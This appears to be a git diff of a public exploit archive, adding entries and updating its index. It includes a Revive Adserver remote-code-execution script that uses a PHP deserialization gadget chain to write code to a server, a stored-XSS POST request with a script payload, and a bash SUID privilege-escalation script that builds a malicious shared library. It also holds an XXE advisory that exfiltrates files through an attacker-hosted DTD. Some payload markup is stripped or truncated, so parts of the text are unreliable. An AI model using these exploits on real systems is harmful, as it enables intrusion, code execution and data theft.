diff --git a/exploits/hardware/webapps/47738.txt b/exploits/hardware/webapps/47738.txt
new file mode 100644
index 000000000..b6bca6acb
--- /dev/null
+++ b/exploits/hardware/webapps/47738.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Intelbras Router RF1200 1.1.3 - Cross-Site Request Forgery
+# Date: 2019-11-06
+# Exploit Author: Joas Antonio
+# Vendor Homepage: intelbras.com.br
+# Software Link: https://www.intelbras.com/pt-br/roteador-wireless-smart-dual-band-action-rf-1200
+# Version: 1.1.3 (REQUIRED)
+# Tested on: Windows
+# CVE : CVE-2019-19516
+
+#POC1:
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/linux/local/47726.sh b/exploits/linux/local/47726.sh
index d2a88dedc..23d92a16d 100755
--- a/exploits/linux/local/47726.sh
+++ b/exploits/linux/local/47726.sh
@@ -20,22 +20,17 @@ runtime loading of a new builtin, which can be a shared object that calls setuid
regains privileges. However, binaries running with an effective UID of 0 are unaffected.
#!/bin/bash
-
-
#Terminal Color Codes
RED='\033[0;31m'
GREEN='\033[0;32m'
NC='\033[0m'
-
#Get the Effective User ID (owner of the SUID /bin/bash binary)
read -p "Please enter effective user id (euid) : " euid
-
#Create a C file and output the exploit code
touch pwn.c
echo "" > pwn.c
-
cat <> pwn.c
#include
@@ -50,7 +45,6 @@ void __attribute((constructor)) initLibrary(void) {
}
EOT
-
echo -e "${RED}"
echo -e "Exploit Code copied to pwn.c !\n"
sleep 5
@@ -64,7 +58,5 @@ echo -e "Exploit Compiled ! \n"
sleep 5
echo -e "Executing Exploit :) \n"
sleep 5
-
-
#Execute the Shared Library
echo -e "${RED}Run : ${NC} enable -f ./libpwn.so asd \n"
\ No newline at end of file
diff --git a/exploits/php/webapps/47730.txt b/exploits/php/webapps/47730.txt
index bcd16c8d8..d15cf08e8 100644
--- a/exploits/php/webapps/47730.txt
+++ b/exploits/php/webapps/47730.txt
@@ -1,7 +1,7 @@
# Exploit Title: SmartHouse Webapp 6.5.33 - Cross-Site Request Forgery
# Discovery by: LiquidWorm
# Date: 2019-12-02
-# Vendor Homepage: http://www.gavazzi-automation.com
+# Vendor Homepage:
# Tested Version: 6.5.33.17072501
# CVE: N/A
# Advisory ID: ZSL-2019-5543
diff --git a/exploits/php/webapps/47737.txt b/exploits/php/webapps/47737.txt
new file mode 100644
index 000000000..8aefee2a3
--- /dev/null
+++ b/exploits/php/webapps/47737.txt
@@ -0,0 +1,30 @@
+# Exploit Title: Online Invoicing System 2.6 - 'description' Persistent Cross-Site Scripting
+# Date: 2019-11-29
+# Exploit Author: Cemal Cihad ÇİFTÇİ
+# Vendor Homepage: https://bigprof.com
+# Software Download Link : https://github.com/bigprof-software/online-invoicing-system
+# Software : Online Invoicing System
+# Version : 2.6
+# Vulernability Type : Cross-site Scripting
+# Vulenrability : Stored XSS
+
+# Stored XSS has been discovered in the Online Invoicing System created by bigprof/AppGini
+# editmembers section. Description parameter affected from this vulnerability.
+# payload:
+
+# HTTP POST request
+POST /inovicing/app/admin/pageEditGroup.php HTTP/1.1
+Host: 10.10.10.160
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 464
+Origin: http://10.10.10.160
+Connection: close
+Referer: http://10.10.10.160/inovicing/app/admin/pageEditGroup.php?groupID=2
+Cookie: inventory=4eg101l42apiuvutr7vguma5ar; online_inovicing_system=vl8ml5or8sgdee9ep9lnhglk69
+Upgrade-Insecure-Requests: 1
+
+groupID=2&name=Admins&description=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E&visitorSignup=0&invoices_insert=1&invoices_view=3&invoices_edit=3&invoices_delete=3&clients_insert=1&clients_view=3&clients_edit=3&clients_delete=3&item_prices_insert=1&item_prices_view=3&item_prices_edit=3&item_prices_delete=3&invoice_items_insert=1&invoice_items_view=3&invoice_items_edit=3&invoice_items_delete=3&items_insert=1&items_view=3&items_edit=3&items_delete=3&saveChanges=1
\ No newline at end of file
diff --git a/exploits/php/webapps/47739.php b/exploits/php/webapps/47739.php
new file mode 100644
index 000000000..eb875ddde
--- /dev/null
+++ b/exploits/php/webapps/47739.php
@@ -0,0 +1,155 @@
+# Exploit Title: Revive Adserver 4.2 - Remote Code Execution
+# Google Dork: "inurl:www/delivery filetype:php"
+# Exploit Author: crlf
+# Vendor Homepage: https://www.revive-adserver.com/
+# Software Link: https://www.revive-adserver.com/download/archive/
+# Version: 4.1.x <= 4.2 RC1
+# Tested on: *nix
+# CVE : CVE-2019-5434
+# Сontains syntax error for protection against skids
+
+
+\'')) : @list($x, $url, $code) = $argv);
+
+ $source = 'data:text/html;base64,'.base64_encode('#');
+ $destination = 'plugins/.htaccess';
+ #$destination = 'var/.htaccess';
+
+ if(!strpos(request($url, $source, $destination), 'methodResponse')) exit(message('failed, no valid response from '.$url));
+
+ $source = 'data:text/html;base64,'.base64_encode($code);
+ $destination = 'plugins/3rdPartyServers/ox3rdPartyServers/doubleclick.class.php';
+ #$destination = 'var/default.conf.php';
+
+ request($url, $source, $destination);
+ message('check '.$url.$destination);
+
+ function request($url, $source, $destination){
+
+ $what = serialize(
+ ['what' =>
+ new Pdp\Uri\Url(
+ new League\Flysystem\File( $destination,
+ new League\Flysystem\File( 'x://'.$source,
+ new League\Flysystem\MountManager(
+ new League\Flysystem\Filesystem(
+ new League\Flysystem\Config,
+ new League\Flysystem\Adapter\Local('')
+ ),
+ new League\Flysystem\Plugin\ForcedCopy
+ )
+ )
+ )
+ )
+ ]
+ );
+
+ $what = str_replace(['\Uri\Url\00'],['\5CUri\5CUrl\00'], str_replace(['s:', сhr(0)],['S:', '\\00'], $what));
+
+ $xml = '
+
+ openads.spc
+
+
+
+
+
+ remote_addr
+ 8.8.8.8
+
+
+ cookies
+
+
+
+
+
+
+
+
+ '.$what.'
+ 0
+ dsad
+ 1
+ 0
+ 1
+
+ ';
+
+ return file_get_contents($url.'adxmlrpc.php', false, stream_context_create(
+ ['http' =>
+ ['method' => 'POST',
+ 'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0',
+ 'header' =>'Content-type: application/x-www-form-urlencoded',
+ 'content'=> $xml
+ ]
+ ])
+ );
+ }
+
+ function message($str){
+ print PHP_EOL.'### '.$str.' ###'.PHP_EOL.PHP_EOL;
+ }
+}
+
+namespace League\Flysystem\Plugin{
+ class ForcedCopy{}
+}
+
+namespace League\Flysystem{
+ class Config{
+ protected $settings = [];
+ public function __construct(){
+ $this->settings = ['disable_asserts' => true];
+ }
+ }
+ class Filesystem{
+ protected $adapter;
+ protected $config;
+ public function __construct($config,$adapter){
+ $this->config = $config;
+ $this->adapter = $adapter;
+ }
+ }
+ class MountManager{
+ protected $filesystems = [];
+ protected $plugins = [];
+ public function __construct($filesystem, $handler){
+ $this->filesystems = ['x' => $filesystem];
+ $this->plugins = ['__toString' => $handler];
+ }
+ }
+ class File{
+ protected $path;
+ protected $filesystem;
+ public function __construct($path, $obj){
+ $this->filesystem = $obj;
+ $this->path = $path;
+ }
+ }
+}
+
+namespace League\Flysystem\Adapter{
+ class Local{
+ protected $pathPrefix;
+ public function __construct($prefix){
+ $this->pathPrefix = $prefix;
+ }
+ }
+}
+
+namespace Pdp\Uri{
+ class Url{
+ private $host;
+ public function __construct($file){
+ $this->host = $file;
+ }
+ }
+}
\ No newline at end of file
diff --git a/exploits/xml/local/47740.txt b/exploits/xml/local/47740.txt
new file mode 100644
index 000000000..2aeeeba69
--- /dev/null
+++ b/exploits/xml/local/47740.txt
@@ -0,0 +1,113 @@
+# Exploit Title: Microsoft Windows Media Center 2002 - XML External Entity MotW Bypass
+# Discovery by: hyp3rlinx
+# Date: 2019-12-03
+# Vendor Homepage: www.microsoft.com
+# CVE: N/A
+
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/WINDOWS-MEDIA-CENTER-MOTW-BYPASS-XXE-ANNIVERSARY-EDITION.txt
+[+] ISR: Apparition Security
+
+
+[Vendor]
+www.microsoft.com
+
+
+[Product]
+Microsoft Windows Media Center
+
+Windows Media Center is a discontinued digital video recorder and media player created by Microsoft.
+Media Center was first introduced to Windows in 2002 on Windows XP Media Center.
+
+
+[Vulnerability Type]
+XML External Entity MotW Bypass (Anniversary Edition)
+
+
+[CVE Reference]
+N/A
+
+
+[Security Issue]
+This vulnerability was originally released by me back on December 4, 2016, yet remains unfixed.
+Now, to make matters worse I will let you know "mark-of-the-web" MotW does not matter here, its just ignored.
+Meaning, if the .MCL file is internet downloaded it gets the MOTW but files still exfiltrated.
+
+Therefore, I am releasing this "anniversary edition" XXE with important motw informations.
+
+This is a fully working remote information disclosure vulnerability that still affects Windows 7.
+Windows 7 is near end of life this January, yet it is still used by many organizations.
+Furthermore, it seems that Windows 8.1 (Pro) can also run Windows Media Center but I have not tested it.
+
+Host the "FindMeThatBiotch.dtd" DTD file in the web-root of the attacker server Port 80 etc...
+Download the ".mcl" file using Microsoft Internet Explorer.
+
+Check the MotW where you downloaded the .mcl file dir /r and note the Zone.Identifier:$DATA exists.
+Open the file and BOOM! watch shitz leaving!... still vulnerable after all these years lol.
+
+OS: Windows 7 (tested successfully) and possibly Windows 8.1 Pro
+
+
+[Exploit/POC]
+1) "M$-Wmc-Anniversary-Motw-Bypass.mcl"
+
+# PoC
+
+
+/FindMeThatBiotch.dtd">
+%junk;
+%param666;
+%FindMeThatBiotch;
+]>
+
+
+2) "FindMeThatBiotch.dtd"
+/%data666;'>">
+
+
+3) Auto exploit PHP .mcl file downloader.
+
+/M$-Wmc-Anniversary-Motw-Bypass.mcl';
+header('Content-Type: application/octet-stream');
+header("Content-Transfer-Encoding: Binary");
+header("Content-disposition: attachment; filename=\"" . basename($url) . "\"");
+readfile($url);
+?>
+
+
+4) python -m SimpleHTTPServer 80
+
+
+
+[POC Video URL]
+https://www.youtube.com/watch?v=zcrATpBNAZ0
+
+
+[Network Access]
+Remote
+
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+Vendor Notification: December 4, 2016
+MSRC "wont fix"
+Dec 2, 2019 : Re-Public "unfixed anniversary" Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index f0d1b99a4..29a3b9ff1 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10823,6 +10823,7 @@ id,file,description,date,author,type,platform,port
47733,exploits/windows/local/47733.txt,"Max Secure Anti Virus Plus 19.0.4.020 - Insecure File Permissions",2019-12-02,hyp3rlinx,local,windows,
47734,exploits/windows/local/47734.py,"Anviz CrossChex 4.3.12 - Local Buffer Overflow",2019-12-02,"Luis Catarino",local,windows,
47735,exploits/xml/local/47735.txt,"Microsoft Excel 2016 1901 - XML External Entity Injection",2019-12-02,hyp3rlinx,local,xml,
+47740,exploits/xml/local/47740.txt,"Microsoft Windows Media Center 2002 - XML External Entity MotW Bypass",2019-12-03,hyp3rlinx,local,xml,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42047,3 +42048,6 @@ id,file,description,date,author,type,platform,port
47725,exploits/php/webapps/47725.txt,"Online Inventory Manager 3.2 - Persistent Cross-Site Scripting",2019-11-29,"Cemal Cihad ÇİFTÇİ",webapps,php,
47730,exploits/php/webapps/47730.txt,"SmartHouse Webapp 6.5.33 - Cross-Site Request Forgery",2019-12-02,LiquidWorm,webapps,php,
47731,exploits/php/webapps/47731.txt,"Dokuwiki 2018-04-22b - Username Enumeration",2019-12-02,"Talha ŞEN",webapps,php,
+47737,exploits/php/webapps/47737.txt,"Online Invoicing System 2.6 - 'description' Persistent Cross-Site Scripting",2019-12-03,"Cemal Cihad ÇİFTÇİ",webapps,php,
+47738,exploits/hardware/webapps/47738.txt,"Intelbras Router RF1200 1.1.3 - Cross-Site Request Forgery",2019-12-03,"Prof. Joas Antonio",webapps,hardware,80
+47739,exploits/php/webapps/47739.php,"Revive Adserver 4.2 - Remote Code Execution",2019-12-03,crlf,webapps,php,